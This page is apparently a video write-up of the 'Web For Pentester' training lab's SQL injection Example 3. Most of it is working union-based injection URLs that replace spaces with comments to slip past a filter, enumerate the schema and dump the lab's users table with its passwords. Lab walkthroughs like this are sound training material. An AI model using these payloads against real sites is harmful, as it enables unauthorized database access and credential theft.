Videos

Published on September 2nd, 2018 📆 | 8164 Views ⚑

0

Web For Pentester SQL Injection Example 3


iSpeech.org


Web For Pentester SQL Injection Example 3
SQL injection is one of the most common web attack mechanisms utilized by attackers to steal sensitive data from organizations
Query Fixed :
http://192.168.174.132/sqli/example3.php?name=root'/**/%23

Let's Find columns :
http://192.168.174.132/sqli/example3.php?name=root'/**/order/**/by/**/5%23

There is 5 Columns Let's Find Vulnerable Column :
http://192.168.174.132/sqli/example3.php?name=root'/**/union/**/all/**/select/**/1,2,3,4,5%23

And 1,2,3 Is Vulnerable.

Let's Find Database Name :
http://192.168.174.132/sqli/example3.php?name=root'/**/union/**/all/**/select/**/(SELECT/**/GROUP_CONCAT(schema_name/**/SEPARATOR/**/0x3c62723e)/**/FROM/**/INFORMATION_SCHEMA.SCHEMATA),2,3,4,5%23

Database Name : exercises

Let's Find tables:
http://192.168.174.132/sqli/example3.php?name=root'/**/union/**/all/**/select/**/(SELECT/**/GROUP_CONCAT(table_name/**/SEPARATOR/**/0x3c62723e)/**/FROM/**/INFORMATION_SCHEMA.TABLES/**/WHERE/**/TABLE_SCHEMA=0x657865726369736573),2,3,4,5%23

Table Name : users

Let's Find columns :
http://192.168.174.132/sqli/example3.php?name=root'/**/union/**/all/**/select/**/(SELECT/**/GROUP_CONCAT(column_name/**/SEPARATOR/**/0x3c62723e)/**/FROM/**/INFORMATION_SCHEMA.COLUMNS/**/WHERE/**/TABLE_NAME=0x7573657273),2,3,4,5%23





Column Names :
id
name
age
groupid
passwd

Let's Extract Data :
http://192.168.174.132/sqli/example3.php?name=root'/**/union/**/all/**/select/**/(SELECT/**/GROUP_CONCAT(id,"~Name~",name,"~Age~",age,"~GID~",groupid,"~Password~",passwd/**/SEPARATOR/**/0x3c62723e)/**/FROM/**/exercises.users),2,3,4,5%23

Extracted Data :
1~Name~admin~Age~10~GID~10~Password~admin
2~Name~root~Age~30~GID~0~Password~admin21
3~Name~user1~Age~5~GID~2~Password~secret
5~Name~user2~Age~2~GID~5~Password~azerty

that's all for this video if you like this video please don't forget to like share and subscribe our channel.

thanks for watching see you in next video.

IF YOU LIKE THIS VIDEO. PLEASE DON'T FORGET TO LIKE SHARE AND SUBSCRIBE OUR CHANNEL.

THANKS FOR WATCHING.


2018-09-02 17:10:57

source

Tagged with:



Comments are closed.






© Torchsec  Privacy Policy Disclaimer  T&C



Back to Top ↑